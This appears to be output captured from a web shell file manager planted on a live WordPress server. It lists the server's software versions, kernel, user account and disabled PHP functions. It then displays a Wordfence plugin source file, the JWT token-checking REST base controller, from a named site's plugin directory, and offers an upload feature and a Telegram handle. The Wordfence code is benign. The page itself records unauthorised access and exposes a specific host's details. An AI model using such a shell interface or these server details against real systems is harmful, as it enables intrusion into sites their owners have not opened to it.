HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux Droplet-NYC1-3 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www-data (33)
PHP: 7.4.3-4ubuntu2.29
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /var/www/html/apwire.net/wp-content/plugins/wordfence/lib/rest-api/
Upload Files
File: /var/www/html/apwire.net/wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php
<?php

abstract class wfRESTBaseController {

	protected $tokenData;

	/**
	 * @param WP_REST_Request $request
	 * @return WP_Error|bool
	 */
	public function verifyToken($request) {
		$validToken = $this->isTokenValid($request);

		if ($validToken &&
			!is_wp_error($validToken) &&
			$this->tokenData['body']['sub'] === wfConfig::get('wordfenceCentralSiteID')
		) {
			return true;
		}

		if (is_wp_error($validToken)) {
			return $validToken;
		}

		return new WP_Error('rest_forbidden_context',
			__('Token is invalid.', 'wordfence'),
			array('status' => rest_authorization_required_code()));
	}

	/**
	 * @param WP_REST_Request $request
	 * @return WP_Error|bool
	 */
	public function verifyTokenPremium($request) {
		$validToken = $this->isTokenValid($request);

		if ($validToken &&
			!is_wp_error($validToken) &&
			$this->tokenData['body']['sub'] === 'wordfence-central-premium'
		) {
			return true;
		}

		if (is_wp_error($validToken)) {
			return $validToken;
		}

		return new WP_Error('rest_forbidden_context',
			__('Token is invalid.', 'wordfence'),
			array('status' => rest_authorization_required_code()));
	}

	/**
	 * @param WP_REST_Request $request
	 * @return bool|WP_Error
	 */
	public function isTokenValid($request) {
		$authHeader = $request->get_header('Authorization');
		if (!$authHeader) {
			$authHeader = $request->get_header('X-Authorization');
		}
		if (stripos($authHeader, 'bearer ') !== 0) {
			return new WP_Error('rest_forbidden_context',
				__('Authorization header format is invalid.', 'wordfence'),
				array('status' => rest_authorization_required_code()));
		}

		$token = trim(substr($authHeader, 7));
		$jwt = new wfJWT();

		try {
			$this->tokenData = $jwt->decode($token);

		} catch (wfJWTException $e) {
			return new WP_Error('rest_forbidden_context',
				$e->getMessage(),
				array('status' => rest_authorization_required_code()));

		} catch (Exception $e) {
			return new WP_Error('rest_forbidden_context',
				__('Token is invalid.', 'wordfence'),
				array('status' => rest_authorization_required_code()));
		}

		return true;
	}
}
@ Telegram